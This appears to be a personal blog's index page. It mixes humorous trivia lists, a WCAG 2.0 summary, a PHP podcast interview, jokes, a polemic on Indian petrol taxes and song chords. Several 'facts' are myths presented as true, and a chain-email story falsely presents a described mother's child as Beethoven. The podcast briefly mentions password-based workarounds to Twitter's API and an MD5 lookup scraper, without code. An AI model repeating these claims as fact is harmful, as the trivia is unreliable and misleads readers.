19. Cats, camels and giraffes are the only animals in the world that
walk right foot, right foot, left foot, left foot, rather than right
foot, left foot .

20. Onions help reduce cholesterol if eaten after fatty meals.

21. The sound you hear when you crack your knuckles is actually the
sound of nitrogen gas bubbles bursting.

Categories: Entertainment, General News, Humour | Tags: , , | 85 Comments

WCAG 2.0 Guidelines

  1. Perceivable:
    The perceivable principle is the first principle and it states that the information on a user interface component must be presentable to users in such a way that they can perceive. The principle one gives more importance on the perceivable aspect of the presentation. This principle specifies four aspects: They are as follows: 

    1. Text Alternatives: Provide text alternatives for any non-text content so that it can be changed into other forms people need, such as large print, braille, speech, symbols or simpler language.
    2. Time-based Media: Provide alternatives for time-based media.
    3. Adaptable: Create content that can be presented in different ways (for example simpler layout) without losing information or structure.
    4. Distinguishable: Make it easier for users to see and hear content including separating foreground from background.
  2. Operable – User interface components and navigation must be operable.
    The second principle is on the operable nature of the content. The operable principle speaks on four aspects. They are mentioned below. 

    1. Keyboard Accessible: Make all functionality available from a keyboard.
    2. Enough Time: Provide users enough time to read and use content.
    3. Seizures: Do not design content in a way that is known to cause seizures.
    4. Navigable: Provide ways to help users navigate, find content, and determine where they are.
  3. Understandable:
    The Third principle speaks on the understandability of the content. It is stated that the Information and the operation of user interface must be understandable. The understandable principle speaks about three aspects. 

    1. Readable: Make text content readable and understandable.
    2. Predictable: Make Web pages appear and operate in predictable ways.
    3. Input Assistance: Help users avoid and correct mistakes.
  4. Robust:
    This is the fourth principle in the WCAG 2.0 recommendation. This principle states that the content must be robust enough that it can be interpreted reliably by a wide variety of user agents, including assistive technologies. The robust principle has only one aspect. 

    1. Compatible: Maximize compatibility with current and future user agents, including assistive technologies.

Developing the web contents so as to meet the guidelines specified in the WCAG2.0 makes the content accessible to more audience.

 

…more about WCAG.

Categories: Programming, Softwares, Tech News | Tags: , , | 68 Comments

The World Is More Dangerous Than I Thought!

Categories: Entertainment, Humour | 15 Comments

Hazards of Mobile Phones

 

Categories: Rochak Chauhan | 191 Comments

Why I Love my India !!!

  • A nation where the price of Rice is Rs.40/- per kg and Sim Card is free.
  • Pizza reaches home faster than an ambulance or police.
  • Car loan @ 5% but education loan @ 12%.
  • Students with 45% get admission in elite institutions thru quota system and those with 90% don’t because of merit.
  • Where a millionaire can buy a cricket team instead of donating the money to charity. 2 IPL teams are auctioned at Rs.3300 crores and India is still a poor country where people starve for 2 square meals a day.
  • A country where footwear that people wear is sold in AC showrooms, but vegetables, that they eat are sold on the footpath.
  • Where everybody wants to be famous but nobody wants to follow the path to be famous.
  • Assembly complex buildings are getting ready within a year while public transport bridges & roads alone take several years to be completed.
  • Where people make lemon juices with artificial flavors and dish wash liquids with real lemon.
Categories: Discussion, Entertainment, Humour | 522 Comments

Left brain vs Right brain

Left vs Right Brain

If clockwise, then you use more of the right side of your brain.
If anti-clockwise, then you use more of the left side of your brain.

It is possible to focus and change the direction of the dancer; see if you can do it.

 

LEFT BRAIN FUNCTIONS RIGHT BRAIN FUNCTIONS
uses logic uses feeling
detail oriented “big picture” oriented
facts rule imagination rules
words and language symbols and images
present and past present and future
math and science philosophy & religion
can comprehend can “get it” (i.e. meaning)
knowing believes
acknowledges appreciates
order/pattern perception Spatial perception
knows object name Knows object function
reality based fantasy based
forms strategies presents possibilities
practical impetuous
safe risk taking

 

Categories: Entertainment, General News | 594 Comments

PHP Innovation Award of 2010 -Podcast episode 9 – PHP Classes blog

Contents

Introduction (0:20)

Interview with Rochak Chauhan – Innovation Award 2010 winner (0:38)

Is PHP loosing popularity to Python and C#? (17:46)

PHP Programming Award nominees of December 2010 (34:22)

The good and the bad of the PHPClasses site according to Rochak Chauhan (42:37)

Conclusion (45:22)

 

 

Download Podcast

 

 

 

 

Introduction (0:20)

Manuel Lemos: Hello, welcome to the Lately in PHP Podcast, this is episode number 9.  I’m Manuel Lemos the regular host, as usual I have here with me Ernani Joppert. Hello Ernani, how are you doing?
Ernani Joppert: Hello, Manuel, glad to be here, I’m doing great.

Interview with Rochak Chauhan – Innovation Award 2010 winner (0:38)

Manuel Lemos: And today we have a special episode because we are interviewing the Innovation Award winner of 2010, Rochak Chauhan. Hello Rochak, how are you doing?
Rochak Chauhan: I’m fine, it’s an honor to be here, thank you.
Manuel Lemos: I hope I have pronounced your name correctly.  I’m not sure how to spell your surname.
Rochak Chauhan: It’s Chauhan, Rochak Chauhan.
Manuel Lemos: Chauhan, I could never guess it.  OK, anyway just a brief introduction about why we are interviewing you. As I mentioned you were the 2010 winner of the PHP Programming Innovation Award.

This award is organized is organized by the PHP Classes site since 2004, and since about a few years ago the site started compiling annual rankings. Basically every month there are a few classes that are nominated and then the users vote and the winner of the votes gets some points. And adding all the points accumulated in each year we get to a winner, and this year, Rochak was the winner of the annual Innovation Award, so congratulations Rochak.

Rochak Chauhan: Thank you, thank you very much.

Manuel Lemos: As prize for this award, Rochak is getting a nice elePHPant. As you all know the elePHPant is the symbol of PHP, and he is getting an elePHPant plush toy. As I already commented, his prize is in the mail and he is going to get it in a few weeks.

ElePHPant PHP mascot

Well, I have to say that your participation in the site has been outstanding, not just in the last year. So for those that have not yet checked Rochak’s participation, so far he has submitted 44 packages, classes, that perform all sorts of functionality useful to PHP developers, and 12 of them were nominated to the Innovation Award throughout all these years in which Rochak has been participating.

And actually in the last year 6 packages that Rochak submitted were nominated. Throughout all these years Rochak has won the monthly awards 3 times. This is quite an impressive record. Rochak can you just comment a bit, not about all, but at least the last packages that you submitted that were nominated on this award, what they do?

Rochak Chauhan: Sure, sure.  First of all the pleasure is all mine.  What I do is, I get immense pleasure like I just want to share things with people.

Now about these classes, there was one of them was Twitter Auto-publish. If you remember Twitter changed their API. So using the user name and password you are not supposed to update your status now without authentication.  So I tried to find a way out using Open Source classes, Open Inviter, I used that class to login and then used the same method to update the status, so it worked.  So this was a small task one of my clients asked me to do and I wanted to share it with everybody.

Manuel Lemos: So a workaround, right?
Rochak Chauhan: It was a workaround.  It’s not illegal but we’re using the user name and password from the user and posting to the Twitter Web site without using the authentication, that’s all.
Manuel Lemos: Yeah, but is this something that Twitter approves or is this a less known API that you used?
Rochak Chauhan: Well, it’s another package called Open Inviter.  What it does, if you open the source code, it takes your user name and password, it’s a login to the website using that, so I use that, not to take any credit from them, I use the authentication, the login process from that. The only thing I added was a method to update the status because the main purpose of Open Inviter is to use the authentication and get the contacts.
Manuel Lemos: Right.  It seems it solved the problem of many people that all of a sudden had their Twitter based applications broken because they could not add OAuth support as easily.
Rochak Chauhan: Exactly.  And that takes huge coding for both sides because you have to create an application on Twitter and then use the same code on the website.  It was tedious so this one helped a lot and many of my clients thanked me personally, so that was a nice feeling.  That again that’s one of the things that keeps you motivated, right.
Manuel Lemos: Right, and what about the other nominated classes last year.
Rochak Chauhan: Another one was again similar, one was Facebook, again, similar thing I used on Facebook and then another one was PHP Duplicate Files Finder.  Now, again, this is a very common problem with every developer. We make updates, we save the backup and then after we have lots of duplicate files, that could be an image file or PHP. So I use basically an MD5 checksum to find the duplicate file names.
Manuel Lemos: Yeah, I remember actually we commented about it in a previous podcast, actually the month when it was announced as one of the winners.  And there were six, right, you commented on three or two so far?
Rochak Chauhan:  I have.  It was again what I basically did was if you rename the file, like say abc.php and I can save it as xyz.php but the content’s the same.  So it basically finds not the name but the content.
Manuel Lemos: That’s interesting, and what about the other classes?
Rochak Chauhan: Another one was PHP Search MySQL Tables. So there is something like you have grep in Linux. You can search files and file contents, but when there are many, automatically you need to find out from the tables the fields where exactly the is coming from, where exactly the label is coming from, so I use this class to do that, search from the text field, search from the label of all the databases.
Manuel Lemos: Yeah, it’s a sort of brute force solution to search the whole database, right?
Rochak Chauhan: Right, right, something like grep for MySQL.
Manuel Lemos: Yeah, I see.
Rochak Chauhan: And there was Text Spinner which was more like used for SEO, like you know if I write an article and it has 1,000 words, if I post it again it won’t count as a different article, so this basically Text Spinner changes synonymous with each other.
Manuel Lemos: Oh, I see, I remember we also commented on that.  Do you think Google would consider that legal because it sort of works around their methods to find duplicate content?
Rochak Chauhan: You can use it that way, like if I want to write multiple articles and I don’t want the changes something like I’m going there, I can say that he went there so he can change it, and I have online demos for that, it’s not always illegal, you can use it for legal purposes also.
Manuel Lemos: Well, when I said legal I didn’t mean in terms of law, I mean in the sense of Google determines how pages may rank or not either being duplicated or not.  OK, what about the other classes?
Rochak Chauhan: And this is again just to add Text Spinner can also be used for like multiple emails, if you send multiple emails you can change the subject and the content of the body without changing the actual meaning.

And then there was Compare Strings. Compare Strings is more like your Levenshtein function we have in PHP. It’s used to compare strings in how much they are related, Compare Strings, and so again it was most of the intent.  And then there was PHP MD5 decrypter, this was highly I could say illegal, it was getting from a Web site which now has a CAPTCHA, so this is not working at the moment now, but this is really just it uses the MD5 checksum…

Manuel Lemos: Yeah, to check existing dictionaries to…
Rochak Chauhan: Exactly.
Manuel Lemos: Yeah.  Maybe they use CAPTCHA because of your class, so many people are using it.

OK, this is quite an interesting collection of innovative classes, and I’m sure that many users of the site have appreciated them. And what I was going to ask you next regarding all these great contributions is what exactly motivates you to write so many innovative classes?

Rochak Chauhan: Number one is how I write it is basically when I face a problem like one of my developers face problems like this cannot be done, this gives me, cannot be done is like things I don’t like that to be said, so I have to find you can use some API or save some mashup but it obviously can be done.

So once I can place something I just want to share it with everybody, like you can say for testing also get the comments and best part to share, that’s what the whole purpose of Open Source is, so that’s what keeps me motivated.

Manuel Lemos: So we could say that your inspiration to contribute innovative classes is the challenges that you get from people telling you that it can’t be done or is also things like needs from your work?
Rochak Chauhan: It’s both, like once some clients come up with a specification this is very difficult like I’m not sure if it can be done, first of all I make it complex somehow using some API or mashup, and then it’s again you want it to be recognized also so I just use the PHP classes as a platform to share it with other developers and get their comments and feedback.
Manuel Lemos: So I imagine that all these classes that certainly were downloaded and used by many people get you great exposure, did you get better work opportunities, jobs, just because you published all these classes?
Rochak Chauhan: Of course, it is a very, very helpful thing, like many people are coming back to me like I used your class, it’s a nice class, now I want to implement it on my project or something, and they offer me as a job, so it’s again helping me as a professional services big boost.
Manuel Lemos: Yes, that’s what I imagine because it’s quite a lot of great classes that you developed, and you probably have many people asking you for further support on them.
Rochak Chauhan: Yes, of course.
Manuel Lemos: OK, and what would you say to motivate other PHP developers who participate in PHP Classes site to also get recognition and better opportunities like you have been getting?
Rochak Chauhan: I guess my first one would be like what I would do is get information like if they find out some new class, some new function or some method to do something, it’s better to contribute back to the society, back to the developer society and share it so that way they’re doing themselves a favor by getting the feedback, getting the recognition, and then you can always share and in return you also get some return, like I’ve also learned lots of new things from these PHP Classes.

It’s something like you have your online repository, you contribute to them and you get everything, the best part it’s all free.

Manuel Lemos: Right.  And well I can see that you somehow have been also inspired by others, by the work of others, and it’s great to see that with so many classes I hope that you are also inspiring others to also contribute with more great classes.

Ernani, I wonder if you have any other thing interesting to ask Rochak?

Ernani Joppert: Yes, I have two questions; one is if you have had any problems submitting packages that you have written for other tasks, if you have found that people that you work with are afraid of sharing their code and if you feel that this is a common difficulty.

And the other question is as you’ve had the opportunity to share the classes that you provided if you would be to inspire others that are listening here, what would be your final words to inspire people to contribute and at least get some exposure and get some other material from the sponsors and everything else?

Rochak Chauhan: Of course.  The answer to your first question is I don’t think I face any problem regarding that. If somebody is very reserved in sharing their code I would like to tell them it’s something like knowledge, you share knowledge it grows.

If I’m writing some code, I’m writing a class, I might be doing something wrong, maybe there might be some better way to do it, now if I share it with people you get feedback, people will tell you that I’ve got lots of things to learn like this, so the constructive feedback you get is the best thing for you to have done as a developer, as a knowledge, so you share and you learn more.

Ernani Joppert: Oh, yes.
Rochak Chauhan: The answer to your second question is again I would like to tell them if I can inspire that’s great, but I would like to tell every developer that whatever they learn share it with other people. It not only will give you confidence but it will give other people too, they’ll give you feedback and you learn in the long run.
Ernani Joppert: Very good, very good, thanks Rochak.
Rochak Chauhan: You’re welcome.
Manuel Lemos: Okay, well basically this interview is practically ended, I just wanted to ask you Rochak is there anything else you’d like to say regarding this award besides what I have asked you?
Rochak Chauhan: I guess I only have praise for this award. This is a very, very like innovative and advanced in a way because this not only gives you recognition but it gives you a way of PHP is getting now. It has lots of innovative things, what people don’t imagine that PHP can also do, like face recognition and we have these AI things going on and it’s amazing stuff. So it just shows the potential of PHP not only as a scripting but as an enterprise level solution and application, it’s really great.
Manuel Lemos: Right.  Well, we are glad that you are enjoying it and I hope you can continue contributing with more innovative packages.
Rochak Chauhan: I will do that, I will do that.  It’s my pleasure, I will do that.
Manuel Lemos: Well, thank you again for this interview.

Is PHP loosing popularity to Python and C#? (17:46)

Now moving on to our next section of this podcast, I would like to bring up a topic, actually a comment, some comments that were posted in the latest TIOBE Ranking system.

For those not familiar with this system, it’s basically a way to evaluate, I mean sort of evaluate because I’m not sure about the accuracy of the conclusions that we can get, but this TIOBE ranking evaluates the popularity of languages.

And the latest rankings I would say for the last 6 months they sort of show that PHP popularity is dropping in favor of languages like Python and Ruby. Well, did you guys see those charts and the comments they produced there?

Rochak Chauhan: I did.  I did.  Let me just add on to that because I think this is you can say momentarily Python is rising due to the Django and other frameworks coming up, but that doesn’t mean PHP is losing any popularity.

Again, it’s in my opinion, because PHP has lots and lots of support like we have lots of framework CMS support and best support API’s, even like Google, Facebook, everybody is giving PHP code and API’s.

So I don’t think rising of Python we need to worry about, as a PHP developer I’m not even worried about this losing the popularity because PHP is I guess closing the gap between scripting and enterprise level solution for an application like ODesk and Facebook has proved that PHP can be used for an enterprise level application also.

So I think the rise of Python and C# momentarily, it’s just a moment, I’m not worried about that.

Manuel Lemos: Right, well, I think it would be important to understand this ranking, how it works. From what I could gather looking at their explanations of how they reached the numbers of popularity of languages, it seems that they go on the search engines and search for things like the name of the language and the programming.

For instance, if they want to evaluate the popularity of PHP they search for PHP programming, and then from the results they evaluate I think the first results and see the popularity of the sites that come up in the Alexa site, which is basically a site that shows statistics of traffic.

And I think it’s more complicated than this, I’m trying to simplify it just so you’ll have an idea, but the way I see it people searching for PHP programming does not mean that it’s every PHP developer.

So whatever these numbers show it seems to me if I interpret this right, the fact that the number of people searching for Python or Ruby or whatever is increasing does not mean that the number of people using other languages, PHP, or whatever, is decreasing is happening. For instance if you already know PHP you won’t be searching for PHP programming. And it’s a bit odd.

And other than that you already mentioned that Python is probably becoming more popular because of a framework like Django and Ruby becoming more popular because, Ruby on Rails, but mainly Python I think there may be a different point of view to justify its popularity.

And that could be related to the fact that there are lots of developers that dream to work at Google. And since Google only works with a few languages like Python and Java, C++ and C, obviously many of them hope to learn Python to someday fulfill that dream of working at Google.

Obviously one thing may never lead to the other but at least they can hope, and that justifies the increase of popularity. And namely since the launch of the App Engine, for those that do not know, App Engine is the cloud computing solution provided by Google, and one of the project leaders is precisely Guido Van Rossum, which is they Python creator and I suppose lead developer, if there is such a role.

And all this I suppose it influences developers to become interested in Python, but that does not mean that the increase of Python fully justifies a decrease in PHP because just like we think about Google we can also think about Facebook which is a very large site and employs hundreds, I don’t know if you can say thousands, but at least hundreds, it’s fair to say that it’s probably a number of engineers that they have there working with PHP. So I don’t think that could justify any drop.

There may be other reasons that may not be obvious for this ranking to suggest that there is an increase of popularity in Python and Ruby at the expense of decrease in popularity of PHP. And as I mentioned before I do not think that the way they compute these rankings really reflects the real popularity.

And this is just to say that this is not a number that should be taken seriously. One aspect that I noticed is if you go there and you notice that for instance, forgetting all this eventual dispute between scripting language, PHP, Python, Ruby and whatever, if you notice JavaScript which is used by practically all Web developers, it’s nowhere near as popular as any other scripting language.

So something is very wrong in this chart, or at least whatever it suggests or probably the algorithm that they are using. And if we all know that every Web developer knows JavaScript and uses it regardless of what is the main language that they use, so I think there is something very wrong in the way they compute this.

Ernani Joppert: And there is nowhere they published, explained how do they find this.
Manuel Lemos: Actually that is there, that is what I was explaining before. They are performing searches for name of the language followed by programming, searched it on Google and then take the first results and evaluate the traffic of the top sites in the Alexa site ranking and then they perform some calculations. This is roughly how I understood it works.

And I’m not sure how people can take this seriously. And if that can be taken seriously how do they justify that JavaScript is not even more popular than I think it should be than any scripting language.

Rochak Chauhan: In my understanding what I think it means people are looking for Python sites more, Python code more. And that basically means that JavaScript and for PHP and they have already bookmarked it, they already have decided the sites.

So in terms of SEO you can say bounce rate is very less. So that means people don’t want to go to look for PHP, they already know.  Like suppose I want to look for PHP code I know PHP Classes there, JavaScript people go to JQuery and Dojo. So they don’t need to search, but in terms of C# and Python people need to look for the repository of forums. That’s what exactly that means in my understanding.

Manuel Lemos: Right, it’s all to say that there is no serious conclusion you can take from this ranking. And for those people that I see commenting they are sort of alarmed that they thought that PHP was no longer as interesting as in the past, I think it’s kind of a silly conclusion.

And another comment that I would like to make is that in my opinion the greatest popularity of PHP comes from its killer applications. And by killer applications I mean applications like WordPress and Drupal, Joomla and many other ready-to-use applications that make PHP very popular.

And they have their own ecosystem and their communities sometimes are quite, I wouldn’t say closed, but I’d say they work pretty much all the time with just themselves. For instance the WordPress community works almost all the time with WordPress. They probably could not care much about general PHP programming outside of the WordPress platform.

So this is something that should give the creators of the TIOBE ranking a lot to think about if they really intend to have their rankings be taken seriously.

And by the way, talking about WordPress, WordPress 3.1 I think, was just released. and by coincidence, or maybe not, it was named… the codename of this release was Django. And when people… I saw comments of people assuming just because the release was named Django it was related to Python.

For those not familiar with Django, Django is a very popular Python framework. And in reality this Django codename was inspired by the author of WordPress, I mean the creator of WordPress, Matt Mullenweg, he’s a big fan of jazz music and there is a jazz musician named Django… I forgot his last name, but that’s where the Jango name came from.

And I don’t know if Matt named this release Django on purpose just to make a joke.  Actually I met Matt Mullenweg in 2008. Actually we invited him to come to our free software event here in Brazil. And I met him personally and I know very well that he likes to make jokes. He’s a very nice person and he’s always happy with his life and he likes to make jokes.

So I wouldn’t be surprised if naming this WordPress release Django was to just make fun of whoever could suppose that it could be related with Python, and obviously it doesn’t. It just could be somebody suggesting there is some relation.

And, well, basically that’s all you have to say about this TIOBE ranking, if anybody was concerned that PHP would really be losing popularity in favor of Python and Ruby, personally I don’t believe it, but I’m sure that those languages, Python and Ruby, are increasing their popularity, which is normal for the reasons that we’ve discussed before.

Ernani Joppert: Yeah, just one point, just one point on the subject, there was a very smart comment on the idea that most of the people are familiarized already with PHP, so they have their go-to places.

And by having Ruby and Python interest and there are also new developers coming forward and Ruby is a very, let’s put it this way, academic language because the concepts are object oriented and stuff. So it could be that people are also trying to follow that approach, and with Ruby being very… tends to be used in startups it could be that this is the reason that it’s ranking up.

But the PHP world has a lot of other technologies on top, as Manuel explained, but I guess that your clarification on the TIOBE Ranking, it’s pretty much what I think it is as well. Tt means that people are searching more for Ruby content or Python content than PHP because PHP has a mature state already, so that’s my thoughts on that.

Manuel Lemos: Right.  But, okay, I’m sure other people will have also their theories and opinions to justify these rankings. And for those that are listening feel free to post your comments to give your opinions about this.

PHP Programming Award nominees of December 2010 (34:22)

But moving on with our podcast now towards the end, we are going to comment about the latest classes that were nominated for the Innovation Award in December 2010, and they were voted in January, and in February the results came out of those that were more voted.

Rochak, in your opinion which classes would you like to comment on that you think are more worth mentioning?

Rochak Chauhan: I think that two of them are the first and the bottom one. The first one was Tic Tac Toe by Amin Saeddi. I really liked how he took up this simple game, used this alpha beta search algorithm. That was the best part. I guess this is one step closer to, like I was saying, PHP moving to AI.

And one of the implementations he can use can demonstrate using the simple game. And you can always use this algorithm to make a complex games like Chess maybe Scribble with PHP. That’s again a good start.

The second one I really liked was it has really, really good implementation is twzCronChart. I have myself this issue like when you look into cron chart. It has lots of text but to present that in Gantt visual impact it’s very easy to find out which cron is run. I think this is a very exceptional attempt, very innovative and very exceptional, very useful.

Manuel Lemos: Right.  As you mentioned, this Tic Tac Toe class which is using the alpha beta search algorithm it shows that developers like Amin Saeddi from Iran are demonstrating that there are many developers that have advanced knowledge on advanced topics like artificial intelligence, as you mentioned.

And not only that but it should also be inspiring to other developers also to come up with their own artificial intelligence solutions in PHP because as it just demonstrated that not only it’s possible but it can be useful.

In this case it’s just a simple game of tic tac toe, but it could be something else more serious not just a game, although it doesn’t mean that games cannot be serious. And as you mentioned, the other class twzCronChart just shows a nice effect that you can do with data from crontab files that define basically the schedule of when certain tasks should be executed.

And using a Gantt chart you can get a pretty good idea, a visual representation of when those tasks should happen. And I think it’s quite useful.

But other than that, Ernani, any other classes that you would like to mention?

Ernani Joppert: Oh, yes, I have two picks. One would be the Proxy Connector from Ska-Man in Italy. And basically it’s used to retrieve remote Web pages under the TOR network. And sometimes you have the need for that and it’s very innovative, so I would give him my congratulations.
Manuel Lemos: Probably it would be interesting if you could explain what is the TOR network for those that are not familiar.
Ernani Joppert: Yeah, the TOR network, it’s pretty much a peer to peer network which is encrypted and it’s based on hopping architecture, so you have one entrance, one point of entry and it’s pretty much randomized the way you reach your ended target.

So let’s say if you’re browsing through the Web you are pretty much anonymous because of the amount of hops that you do when you’re requesting a webpage. It pretty much can go ten times around the world and reach the point of entry which is let’s say near your house but you went a long way to get back to the reaching point that you wanted.

So it’s good for anonymity and it’s also good because there are the needs for whistle blowers as Wikileaks have proven. So sometimes you have to extract information and you don’t want to be identified for some reason. And the usage of this class if very clever and it’s very innovative, so that’s why I would give my vote for them.

And the other one would also be the Gantt chart because sometimes a picture is worth more than a thousand words. So it’s very nice to know that Tony from Australia has come up with this idea and proven that visually representing some information is what it needs.

And I guess most PHP Classes users would be using this sooner or later, at least for documentation purposes and to visually represent some batch operations that are run on those servers.

Manuel Lemos: Right.  Well, for me I also like to comment on a couple of classes. One is this Search by Relevance by Carlson Soares from Brazil. What basically it does is to implement a sort of sorting algorithm.

And what it does is basically have a result, have a series of results, and analyzes the keywords that are used in those results and sorts them according an algorithm relevance. And this could be useful for many purposes of finding what is more relevant in a set of information that could be retrieved for instance from MySQL databases.

And the other class that I would like to comment on just briefly because I’m not an expert but I think it is interesting, is this AllowHTML by Simon Emery from England. And what it does is to filter insecure HTML according to OWASP Anti-Samty rules.

For those not familiar, OWASP is an organization that is focused on promoting security, implementation of security norms, rules, practices in general that will help make applications more secure and eventually more immune to abuses and all sorts of security attacks.

And this is basically the two classes that I would like to mention.

The good and the bad of the PHPClasses site according to Rochak Chauhan (42:37)

Manuel Lemos: And now practically ending this podcast just a final section, since we have a guest, Rochak, when we have a guest we usually ask, in your case because you’re a PHP Classes site user, to comment about one good thing and then another bad or not so good thing about PHP Classes site that you think to be worth commenting on.

Rochak Chauhan: Sure. One thing I really like is the indexing, the way you have sorted down in the categories, and sub-categories, it makes life for a developer very, very easy. I really love the indexing, that’s number one.

And one thing I would like you to add, one thing you can improve is have some section where people can post which class, which package they’re looking for, something like a wish list.  So if that is there it will make it very, very effective, more effective.

Manuel Lemos: Actually, that is one thing that is my wish list for many years. And unfortunately I was not able to get it sufficient priority to actually implement it. There are many, many things that could be done to improve the site and I never stop. Once I implement something I move on to the next.

I understand that is an idea that would be interesting because it will also be helpful for developers looking for ideas to implement innovative classes. And one thing will sort of marry with the other and the need for a solution for a problem that was not yet solved and the search of developers that are interested in developing innovative classes to get there.

So, just so you’ll be sort of happy with this I’m sure I will implement it sooner or later, I just don’t know when, but sooner or later I’ll get there as every other thing that people have been asking over the years and I ended up implementing. It just did not come the turn of that idea but it’s actually in my wish list for many years already.

Conclusion (45:22)

Manuel Lemos: OK, I think we have reached the end of our podcast. Rochak, I would like to thank you for your presence and also your participation in PHP Classes site. I hope you can continue to submit more innovative classes.

Rochak Chauhan: I’ll do that.  The pleasure is all mine like I said.
Manuel Lemos: Great.  And I think for me that’s all, Ernani?
Ernani Joppert: Yes, I would like to thank Rochak for participating here, also for contributing and to give his overviews, it was a very clever interview.

And it’s nice to see that we are coming to a global world where it doesn’t matter where you’re from, it just matters your interest level, your intentions to contribute and your intentions to learn.

And this expressed most of our character and that’s what we want to have in the IT world because we want to have people with hungry minds to learn with potential to provide good solutions, creative solutions, and as well have a good community, a community of people everywhere in the world with different cultures.

So I would like to express that and thanks everyone for listening, and I’d like to listen to more feedback from the community here.

Manuel Lemos: That would be great.  Okay, I think that’s all for now, bye.
Rochak Chauhan: Bye, thank you.
Ernani Joppert: Bye, bye.

 

Download Podcast

 

View Source Page…

 

Categories: Discussion, General News, Others, PHP Code | 20 Comments

Apple Introduces Revolutionary New Laptop With No Keyboard

Apple Introduces Revolutionary New Laptop With No Keyboard

Categories: Entertainment, Humour | 540 Comments

Some Crazy Facts

  1. If u yelled for 8 years, 7 months and 6 days you would have produced enough sound energy to heat one cup of coffee.  (Hardly seems worth it.)
  2. If you farted consistently for 6 years and 9 months, enough gas is produced to create the energy of an atomic bomb.  (Now that’s more like it!)
  3. The human heart creates enough pressure when it pumps out to the body to squirt blood 30 feet.  (O.M.G.!)
  4. A pig’s orgasm lasts 30 minutes.  (DAMN IT !!!!)
  5. A cockroach will live nine days without its head before it starves to death.  (Creepy…but I’m still not over the pig.)
  6. Banging your head against a wall uses 150 calories a hour. (Don’t try this at home, maybe at work)
  7. The male praying mantis cannot copulate while its head is attached to its body. The female initiates sex by ripping the male’s head off. (Honey, I’m home. What the…?!)
  8. The flea can jump 350 times its body length. It’s like a human jumping the length of a football field. (30 minutes..lucky pig! Can you imagine?)
  9. The catfish has over 27,000 taste buds.  (What could be so tasty on the bottom of a pond?)
  10. Some lions mate over 50 times a day. (I still want to be a pig…quality over quantity)
  11. Butterflies taste with their feet. (Something I always wanted to know.)
  12. The strongest muscle in the body is the tongue.  (Hmmmmmm…. … )
  13. Right-handed people live, on average, nine years longer than left-handed people. (If you’re ambidextrous, do you split the difference?)
  14. Elephants are the only animals that cannot jump.  (Okay, so that would be a good thing)
  15. A cat’s urine glows under a black light. (I wonder who was paid to figure that out?)
  16. An ostrich’s eye is bigger than its brain. (I know some people like that)
  17. Starfish have no brains. (I know some people like that too.)
  18. Polar bears are left-handed. (If they switch, they’ll live a lot longer)
  19. Humans and dolphins are the only species that have sex for pleasure. (What about that pig??)
Categories: Discussion, Entertainment, Humour | 454 Comments

Some tough choices…

Tough Choices

Question 1: If you knew a woman who was pregnant, who had 8 kids already, three who were deaf, two who were blind, one mentally retarded, and she had syphilis, and she was now pregnant again, would you recommend that she have an abortion?

Read the next question before looking at the response for this one.

Question 2: It is time to elect a new world leader, and only your vote counts.

Here are the facts about the three candidates.

Candidate A – Associates with crooked politicians, and consults with astrologers. He has had two mistresses. He also chain smokes and drinks 8 to 10 martinis a day.

Candidate B – He was kicked out of office twice, sleeps until noon, used opium in college and drinks a quart of whiskey every evening.

Candidate C – He is a decorated war hero. He’s a vegetarian, doesn’t smoke, drinks an occasional beer and never cheated on his wife.

Which of these candidates would be your choice?

Decide … and scroll down for the identities of these candidates.

Candidate A was Franklin D. Roosevelt.

Candidate B was Winston Churchill.

Candidate C was Adolf Hitler.

And, by the way, on your answer to the abortion question:

If you said YES …… you just killed Beethoven - the greatest musician of the western world.

The seemingly right and logical choices we make in life are not necessarily the best option always.

Categories: Discussion, Entertainment, General News, Humour | 508 Comments

Ladakh

Categories: Entertainment, General News | 594 Comments

Petrol Prices in India

Petrol Price per liter in our neighbors and other countries

Pakistan = 26Rs

Bangladesh = 22Rs

Cuba = 19Rs

Nepal  = 34Rs

Burma = 30Rs

Afghanistan = 36Rs

Qatar = 30Rs

Chine =23 Rs

USA=2$ a gallon =30Rs/liter approx

In all these countries, basic cost of petrol is 15-17 Rs and taxation comes to another 15 Rs or so i.e. price doubles because of tax.

India=53Rs


Basic cost of petrol =16.50 Rs

Central tax = 11.80

Central Excise duty 9.75

State tax=8

Vat 4

Total 50.50, now made 53

India is the only country which tripples the cost of petrol because of tax

India collects the majority of central tax and Central excise from oil only

(Actually our cost of oil is even less because ONGC produces 1/3rd of our oil for 20Rs per barrel but sells at 70Rs a barrel to govt, which pockets the royalties.)

HPCL profit 574 Cr

IOC 5556 Cr

BPCL 5015 Cr

Centre collects corporate tax also from these companies.

Why does our Indian govt collect so much tax from a raw material?

Because the finance ministry is lazy and corrupt and finds it difficult to collect from end products – because then those babus will have to actually work.

So much easier to apply a strangle hold on oil companies and extract the money (like a ransom) even before it has been put to productive use in the economy.

Cost to economy because of excessive taxation of oil sector is estimated at 3% of GDP.

The tax collected is anyway wasted in corruption and nepotism

Spread the awareness! Send / Share this link to your friends.

Categories: Discussion, General News | 262 Comments

Waka waka (FIFA 2010 Theme) SHAKIRA


The song is based on 4 chords- D-A-Bm-G -that keep repeating in the same order.

D
You’re a good soldier
A
Choosing your battles
Bm
Pick yourself up
G
And dust yourself off
And back in the saddle

D
You’re on the frontline
A
Everyone’s watching
Bm
You know it’s serious
G
We’re getting closer
This isnt over

D
The pressure is on
A
You feel it
Bm
But you’ve got it all
G
Believe it

D
When you fall get up
Oh oh…
A
And if you fall get up
Eh eh…

Bm
Tsamina mina
Zangalewa
G
Cuz this is Africa

D
Tsamina mina eh eh
A
Waka Waka eh eh
Bm
Tsamina mina zangalewa
G
This time for Africa

D
Listen to your god
A
This is our motto
Bm
Your time to shine
G
Dont wait in line
Y vamos por Todo

D
People are raising
A
Their Expectations
Bm
Go on and feed them
G
This is your moment
No hesitations

D
Today’s your day
A
I feel it
Bm
You paved the way
G
Believe it

D
If you get down
Get up Oh oh…
A
When you get down
Get up eh eh…

Bm
Tsamina mina zangalewa
G
This time for Africa

D
Tsamina mina eh eh
A
Waka Waka eh eh

Bm
Tsamina mina zangalewa
G
Anawa aa

D
Tsamina mina eh eh
A
Waka Waka eh eh
Bm
Tsamina mina zangalewa
G
This time for Africa


Original tabs by: Anne

Categories: Chords and Tabs | Tags: , , , , , | 785 Comments